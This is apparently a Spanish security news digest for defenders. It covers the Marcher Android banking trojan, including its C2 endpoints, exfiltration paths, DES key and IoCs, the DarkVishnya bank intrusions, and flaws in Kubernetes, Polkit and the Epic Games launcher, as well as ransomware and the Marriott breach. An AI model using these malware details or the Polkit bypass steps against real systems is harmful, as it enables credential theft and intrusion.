‘Marcher’ es un troyano bancario destinado, principalmente, a robar datos bancarios, incluyendo datos de tarjetas de créditos y credenciales de acceso al sistema bancario. Para llevar a cabo el robo de datos, este malware actúa de forma similar a otras familias de malware para Android, comprobando en segundo plano las aplicaciones activas en cada momento. Si se abre una aplicación bancaria o cualquier otra aplicación afectada, el troyano muestra una ventana falsa con la imagen del banco afectado y solicitando los datos de acceso, simulando a la aplicación real para engañar al usuario y obtener las credenciales.

El equipo de análisis de malware de Hispasec ha analizado la nueva muestra, y como resultado del análisis podemos apreciar que esta nueva versión del malware introduce algunos cambios con respecto a versiones anteriores del mismo.

En primer lugar, la aplicación conecta al servidor de control a través del protocolo HTTP. Realiza una petición a las URLs hxxp://aperdosali.top/get_key y hxxp://aperdosali.top/get_file, para descargar un fichero cifrado y la clave de descifrado. Dicho fichero es un fichero APK, es decir, una nueva aplicación. Pero esta no se instalará en el dispositivo, sino que se utilizará para cargar dinámicamente el código malicioso que se encarga de mostrar y ocultar las inyecciones (ventanas falsas para robar los credenciales).

Una vez descargado el código del inyector, la aplicación envía información sobre el dispositivo (imei, número de teléfono, aplicaciones instaladas, etc.).

Captura de pantalla de 2018-12-08 03-29-31Envío de información del dispositivo cifrada Captura de pantalla de 2018-12-08 02-00-28Información del dispositivo que se envíaComo podemos apreciar en la imágenes, todo el envío de información al servidor de control se hace cifrando la información e indicando el identificador del ‘bot’ (dispositivo infectado).

Esta versión de ‘Marcher’ incluye la lista de bancos y aplicaciones afectadas cifrada, por lo que no es posible acceder a ella directamente. La lista de aplicaciones afectadas y el resto de la configuración del troyano se encuentran entre los ‘assets’ de la aplicación cifrados con algoritmo DES y usando la clave 6b34f4f6.

Captura de pantalla de 2018-12-08 03-44-12Parte de la lista de aplicaciones afectadasAdemás de la posibilidad de mostrar una ventana falsa con una versión web para el robo de credenciales, esta versión incluye inyectores nativos específicos. Para estos inyectores, se realiza una petición a la URL hxxp://aperdosali.top/inj_pkg/BASE64_PACKAGE_ID , donde BASE64_PACKAGE_ID es el identificador del paquete codificado en Base64. Como respuesta, el servidor devuelve un fichero ZIP que contiene los datos necesarios para mostrar la ventana falsa (logos de la entidad afectada y texto en el idioma que corresponda).

Captura de pantalla de 2018-12-08 03-56-38Datos descargados para la inyección de EurobankY una vez descargados los datos necesarios para realizar la inyección, la aplicación espera a que el usuario abra la aplicación afectada para mostrar la ventana falsa.

Captura de pantalla de 2018-12-08 01-30-17Ventana falsa para la aplicación de EurobankUna vez que el usuario rellena los datos y los envía, la aplicación oculta la ventana falsa y muestra la aplicación legítima mientras envía los datos al servidor de control a través de la URL hxxp://aperdosali.top/api/form. En el caso de las inyecciones que solicitan datos de tarjetas de credito, estos se envían al servidor de control a través de la URL hxxp://aperdosali.top/api/cards.

La muestra analizada afecta a aplicaciones de entidades bancarias Europeas (Austria, Alemania, Francia, Polonia, Turquía), de Estados Unidos, China, Singapure y Taiwan.

Como siempre, desde Hispasec recomendamos instalar aplicaciones de plataformas reconocidas como Google Play y nunca de lugares desconocidos. Y aunque se descarguen de plataformas reconocidas, siempre deben tener cuidado porque incluso en estas plataformas podemos encontrar de vez en cuando alguna aplicación maliciosa, como ya se hemos visto en otras ocasiones.

IoCs:
C2
aperdosali.top
comedirtad.top
47.74.70.68

SHA256 de la muestra
2f748905818f8385f3d43212a60f9ee113d59b6b7bf3fd195a2c790ccca92a07

SHA256 del Inyector
a203d33154941f03ed43f9ff3688dba176554cf157aed2b9a65eef176720aaa3

Más información:

Información sobre la evolución del troyano Marcher/Exobot:
https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html

Bancos atacados mediante conexiones locales

Al menos ocho bancos de Europa del Este han sido atacados usando el mismo modus operandi, bautizado por Karspersky como DarkVishnya, causando más de diez millones de dólares en pérdidas.

181204-vishnya

 

Durante el año 2017 y también durante este mismo año, especialistas de la compañía antivirus Kaspersky investigaron varios incidentes de robo en al menos ocho bancos europeos.

Todos ellos compartían el mismo patrón de actuación; un dispositivo conectado diréctamente a la red local de la organización. En ocasiones en alguna oficina central, en otras, en una oficina regional o incluso, en otro país distinto.

El ataque comprende 3 fases bien definidas:

En una primera fase, se consigue acceso físico con la excusa de entregar un paquete, buscar un empleo en la compañía, etc. Una vez dentro de las instalaciones, se conecta un dispositivo a un PC o a alguna regleta con conexiones RJ45 (en alguna sala de reuniones o en lugares apartados sin llamar mucho la atención).

Éste dispositivo comunmente puede ser un netbook o un portátil barato, una Raspberry Pi o un Bash Bunny. Una vez conectado, el acceso a la red se conseguía mediante una conexión GPRS/3G/LTE presente en el dispositivo.

Más tarde, en una segunda fase, los atacantes comienzan a ganar acceso a directorios compartidos, servidores web y cualquier otro recurso abiertamiente disponible con el objetivo de obtener la mayor cantidad de información sobre la red. También usaban fuerza bruta o esnifaban conexiones de red para moverse lateralmente hasta llegar finalmente a las máquinas responsables de hacer pagos.

En la tercera y última fase, se mantenía el acceso a las máquinas de la organización mediante técnicas habituales para poder acceder en cualquier otro momento, tales como la habilitación de puertas traseras, escritorios remotos, etc.

 

Más información:

https://securelist.com/darkvishnya/89169/

 

Elevación de privilegios en Kubernetes

Una vulnerabilidad en el sistema de orquestación de Google permitiría a un atacante sin autenticar, conseguir privilegios de administrador en cualquier nodo de un cluster basado en Kubernetes.

kubernets-logo

Kubernetes es un sistema de orquestación open-source para gestionar aplicaciones en contenedores Docker, entre otros.

La vulnerabilidad, considerada de gravedad crítica, se encuentra en el componente OpenShift Container Platform 3.x y permitiría comprometer los “pods” en ejecución de un determinado nodo. Los “pods” son las unidades mínimas que puede manejar Kubernetes, y se componen de uno o más contenedores y volúmenes.

El fallo reside en una conexión TCP vulnerable, a través de la cuál un atacante remoto podría enviar peticiones especialmente manipuladas al servidor de API de Kubernetes y establecer una conexión con el “backend” utilizando las credenciales TLS de dicho servicio. De esta forma, podría acceder a cualquier “pod” en ejecución y acceder a información secreta, variables de entorno, procesos en ejecución, volúmenes, etc. Así como acceder a contenedores privilegiados. Adicionalmente, en versiones 3.6 y superiores de OpenShift Container Platform, la vulnerabilidad permitiría acceder con permisos de “administrador de cluster” a cualquier API del servidor de API de OpenShift, como por ejemplo los servicios ‘metrics-service’ y ‘servicecatalog’.

Un atacante con privilegios de administrador de cluster podría desplegar código malicioso o alterar alguno de estos servicios en ejecución.

Decir, que el servidor de API de OpenShift está incluido por defecto en todas las instalaciones de Kubernetes.

La vulnerabilidad ya se ha corregido y se recomienda actualizar cuanto antes.

Versiones seguras de OpenShift Container Platform:

  • v3.11.43-1
  • v3.10.72-1
  • v3.9.51-1
  • v3.8.44-1
  • v3.7.72-1
  • v3.6.173.0.140-1
  • v3.5.5.31.80-1
  • v3.4.1.44.57-1
  • v3.3.1.46.45-1
  • v3.2.1.34-2

 

Más información:

CVE-2018-1002105: proxy request handling in kube-apiserver can leave vulnerable TCP connections
https://github.com/kubernetes/kubernetes/issues/71411

Kubernetes Security Announcement – v1.10.11, v1.11.5, v1.12.3 released to address CVE-2018-1002105
https://groups.google.com/forum/#!forum/kubernetes-announce

Kubernetes privilege escalation and access to sensitive information in OpenShift products and services – CVE-2018-1002105
https://access.redhat.com/security/vulnerabilities/3716411

Acceso root en Polkit para usuarios con uid mayor a INT_MAX

Screenshot_20181205_103550

El fallo, que aún no está solucionado, es reproducible ejecutando cualquier aplicación que utilice PolicyKit

PolicyKit, comúnmente llamado Polkit, es un componente para los sistemas Unix que permite a procesos no privilegiados ejecutar funciones que requieren permisos de superusuario, sin que estos tengan que ejecutarse como root. A diferencia de sudo, no requiere que todo el proceso sea ejecutado con privilegios del sistema, dando un mayor control sobre los permisos.

Este componente, empleado en la mayoría de distribuciones GNU/Linux y utilizado por múltiples programas, no controla correctamente los permisoscuando el usuario tiene un número de identificación (UID) superior al de INT_MAX (2147483647), pudiendo utilizar Polkit sin ninguna restricción y sin que se pida ninguna contraseña.

Screenshot_20181205_104333Ejemplo de explotación con un usuario con uid 4000000000. El usuario es capaz de parar un servicio, sin que este tenga permisos para ello.

Un ejemplo de programa que utiliza Polkit es Systemctl: cuando no son necesarios permisos, por ejemplo para ejecutar ‘systemctl status nginx’, se ejecuta el comando sin restricciones. No obstante, para ejecutar ‘systemctl stop nginx’ (parar un servicio), aparece una ventana de confirmación solicitando la contraseña del usuario, y sólo si éste estuviese autorizado podrá realizar la acción. Con esta vulnerabilidad, el comando se ejecuta sin necesidad de estar autorizado y sin que aparezca la ventana de confirmación.

La vulnerabilidad, con identificador CVE-2018-19788, todavía no se encuentra solucionada, aunque su explotación es complicada salvo que exista ya un usuario con un uid superior a 2147483647, algo de por sí difícil, y que probablemente sea la razón por la que ha pasado el fallo tanto tiempo desapercibido. Para probar la vulnerabilidad, basta con crear un nuevo usuario del sistema y modificar el uid, pudiendo ejecutar cualquiera de los comandos anteriores.

Más información:

CVE-2018-19788:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19788

unprivileged users with UID > INT_MAX can successfully execute any systemctl command:
https://github.com/systemd/systemd/issues/11026

Freedesktop issue:
https://gitlab.freedesktop.org/polkit/polkit/issues/74

Nuevo ransomware se difunde rápidamente en China

Un nuevo y característico ransomware se está propagando por China. De momento, ha infectado más de 100.000 equipos y va en aumento.

¿Por qué es diferente al resto de ransomwares vistos?

Lo característico de este malware es que, a diferencia del resto de ransomwares conocidos, no pide como rescate un pago en Bitcoin, sino 110 yuanes (alrededor de 14€) que se deben enviar a través de la aplicación WeChat Pay, la función de pago que ofrece la aplicación de mensajería más popular de China.

¿Cómo funciona el ransomware?

Propagación:

Según los investigadores de Velvet Security, los atacantes agregaron código malicioso al software de programación “EasyLanguage” utilizado por un gran número de desarrolladores de aplicaciones.

El software modificado fue diseñado para inyectar el código del ransomware en cada aplicación y producto de software compilado a través de él.

Evasión de antivirus:

Para evadir los programas de antivirus, los atacantes firmaron su código con la firma digital confiable de Tencent Technologies.

Rescate:

Una vez cifrado, el ransomware crea una nota y le pide a los usuarios que paguen la cantidad de 110 yuanes a la cuenta de WeChat de los atacantes en un plazo de tres días. Si no se paga dentro del tiempo mostrado, amenazan con eliminar automáticamente la clave de descifrado de su servidor C&C.

Robo de información y credenciales:

Una vez infectado el dispositivo, el malware recopila las credenciales de inicio de sesión de los sitios web chinos más populares y las envía a un servidor remoto.

Además, recopila información del dispositivo como: modelo de CPU, resolución de pantalla, información de la red, software instalado, etc.

¿Existen soluciones contra este malware?

Los investigadores de seguridad han descubierto que el cifrado utilizado por el ransomware es más débil de lo que parecía. Mientras que los atacantes especifican en la nota que utilizan DES para cifrar los archivos, realmente utilizan XOR y almacenan una copia de la clave de descifrado localmente.

Ruta de la clave de cifrado:
% user% \ AppData \ Roaming \ unname_1989 \ dataFile \ appCfg.cfg

Con está información, el equipo de seguridad de Velvet ha lanzado una herramienta gratuita de descifrado de este ransomware que puede desbloquear fácilmente los archivos cifrados.

Más información:

Información oficial:
https://www.huorong.cn/info/1543934825174.html

Fuga de información en la cadena hotelera Marriott

La compañía hotelera Marriott ha declarado que la base de datos de reservas deStarwood (filial de Marriott) ha sido comprometida, viéndose expuestos datos de hasta 500 millones de clientes, de los cuales 327 millones incluirían los datos de las tarjetas de crédito con la que se ha realizado el pago.

marriott-hotel-logo

El 8 de septiembre de 2018 la cadena Marriott recibió la alerta del acceso a la base de datos de reservas de la red de Starwood a través de una herramienta interna de seguridad. En ese momento, la corporación contrató un servicio externo de expertos en seguridad para investigar el caso. Durante la investigación se descubrió que ha existido un continuo acceso no autorizado desde 2014. Por el momento no se han revelado los datos exactos extraídos de la base de datos, pero se estima que hasta 500 millones de personas que hicieron una reserva podrían estar afectados por esta brecha de seguridad.

Se estima que entre los afectados, existirían unos 327 millones de registros que contendrían información sensible acerca del medio de pago utilizado (número de tarjeta de crédito, fecha de vencimiento, etc.), datos personales del usuario (nombre, dirección, teléfono, correo electrónico, fecha de nacimiento, documento de identidad / pasaporte, etc.), información de la reserva (Check-in y Check-out), preferencias de comunicación y el identificador Starwood Preferred Guest (“SPG”).

La información referente a los medios de pago utilizados por los usuarios se encontraría cifrada con el algoritmo AES-128 y se necesitarían dos componentes para descifrarla, aunque aun no se ha confirmado si estos habrían sido conseguidos por los atacantes.

La cadena hotelera ha declarado que esta brecha de seguridad ha afectado únicamente a la red de Starwood, no habiendo sufrido ninguna modificación ni filtración la base de datos de Marriott.

Marriott International adquirió Starwood Hotels and Resorts Worldwide por 13 billones de dólares en 2016, Incluyendo las siguientes propiedades potencialmente afectadas: St. Regis, Sheraton Hotels & Resorts, W Hotels, Westin Hotels & Resorts, Aloft Hotels, Tribute Portfolio, Element Hotels, Le Méridien Hotels & Resorts, The Luxury Collection, Four Points by Sheraton y Design Hotels.

Se han establecido diversos números de teléfono para que aquellos usuarios que hayan realizado una reserva en alguno de los hoteles mencionados en fechas comprendidas entre el año 2014 y el pasado 10 de septiembre de 2018 puede comunicarse con la compañía y recibir información al respecto.

Más información:
Starwood Guest Reservation Database Security Incident
https://answers.kroll.com/

500 Million Marriott Guest Records Stolen in Starwood Data Breach
https://thehackernews.com/2018/11/marriott-starwood-data-breach.html

Inyección de comandos en el lanzador de Epic Games

Se ha detectado una vulnerabilidad que podría permitir la inyección de comandos en el lanzador o ‘launcher’ de Epic Games.

Epic Games

Epic Games es una empresa de desarrollo de videojuegos estadounidense, bien conocida tanto por los motores de juegos Unreal Engine como por videojuegos de la talla de la serie de ‘shooters’ en primera persona Unreal, la saga Gears of War y Fortnite.

El problema se debe a un error de falta de comprobación al procesar una URI por parte del manejador del protocolo ‘com.epicgames.launcher’. Esto podría desencadenar la ejecución de una llamada al sistema compuesta por una cadena proporcionada por el usuario, que podría ser aprovechada para inyectar comandos en el contexto del usuario.

Esta vulnerabilidad permitiría a un atacante remoto ejecutar código arbitrario en instalaciones vulnerables de Microsoft Visual Studio con herramientas para el desarrollo de Unreal Engine instalado. Es necesaria la interacción del usuario para aprovechar exitosamente esta vulnerabilidad (lo que podría lograrse sin su conocimiento al ser engañado para visitar una página web maliciosa o abrir un archivo malicioso).

Esta vulnerabilidad, descubierta por el usuario ‘rgod’ de ‘9sg Security Team’, ha sido identificada como CVE-2018-17707 y puntuada con 8.8 sobre 10 debido a su peligrosidad. Ha sido corregida en la versión 8.2.2 del lanzador de Epic Games.

Más información:

Epic Games Launcher Protocol Command Injection Remote Code Execution Vulnerability
https://www.zerodayinitiative.com/advisories/ZDI-18-1359/